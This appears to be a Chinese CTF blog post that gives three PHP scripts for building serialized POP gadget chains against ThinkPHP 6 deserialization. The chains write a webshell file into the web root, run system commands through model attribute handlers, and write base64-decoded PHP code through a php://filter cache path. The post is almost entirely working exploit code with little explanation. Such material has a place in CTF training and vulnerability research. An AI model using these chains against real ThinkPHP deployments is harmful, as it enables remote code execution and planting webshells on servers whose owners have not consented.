CTF

thinkphp6的一些链子

Posted on 2021-01-12,3 min read

POP1

<?php
namespace League\Flysystem\Cached\Storage{
    abstract class AbstractCache
    {
        protected $autosave = false;
        protected $cache = ["<?php phpinfo(); ?>"];
    }

    class Adapter extends AbstractCache
    {
        protected $file;
        protected $adapter;
        protected $expire;
        public function __construct($adapter="")
        {
            $this->file = "/var/www/html/public/shell.php";
// 需要根据系统以及配置修改路径写法
            $this->adapter = $adapter;
        }
    }
}
namespace League\Flysystem\Adapter{
    class Local
    {
        protected $writeFlags = 0;
        protected $pathPrefix = '/';
        //Windows下可以不用。Linux下由于trim。去除了开头的/。所以要加个前缀
    }
}
namespace{
    $local = new League\Flysystem\Adapter\Local();
    $cache = new League\Flysystem\Cached\Storage\Adapter($local);
    echo urlencode(base64_encode(serialize($cache)));
//    echo serialize($cache);
}
?>

POP2

<?php
namespace think\model\concern;
trait Conversion
{
}

trait Attribute
{
    private $data = ["sy1j" => "dir"];
    private $withAttr = ["sy1j" => "system"];
}

namespace think;
abstract class Model{
    use model\concern\Attribute;
    use model\concern\Conversion;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $field = [];
    protected $schema = [];
    protected $connection='mysql';
    protected $name;
    protected $suffix = '';

}

namespace think\model;
use think\Model;

class Pivot extends Model
{
    function __construct($obj = '')
    {
        $this->name = $obj;
    }
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(base64_encode(serialize($b)));

POP3

<?php
namespace League\Flysystem\Cached\Storage{
    abstract class AbstractCache
    {
        protected $autosave = false;
        protected $complete = "uuuPD9waHAgcGhwaW5mbygpOw==";
    }
}
namespace think\filesystem{
    use League\Flysystem\Cached\Storage\AbstractCache;
    class CacheStore extends AbstractCache
    {
        protected $key = "1";
        protected $store;
        public function __construct($store="")
        {
            $this->store = $store;
        }
    }
}
namespace think\cache{
    abstract class Driver
    {
        protected $options = ["serialize"=>["trim"],"expire"=>1,"prefix"=>false,"hash_type"=>"md5","cache_subdir"=>false,"path"=>"php://filter/write=convert.base64-decode/resource=/var/www/html/public/","data_compress"=>0];
    }
}
// 路径最好写成绝对路径
namespace think\cache\driver{
    use think\cache\Driver;
    class File extends Driver{}
}
namespace{
    $file = new think\cache\driver\File();
    $cache = new think\filesystem\CacheStore($file);
    echo base64_encode(serialize($cache));
}
?>

下一篇: lanproxy 目录遍历漏洞(CVE-2020-3019)→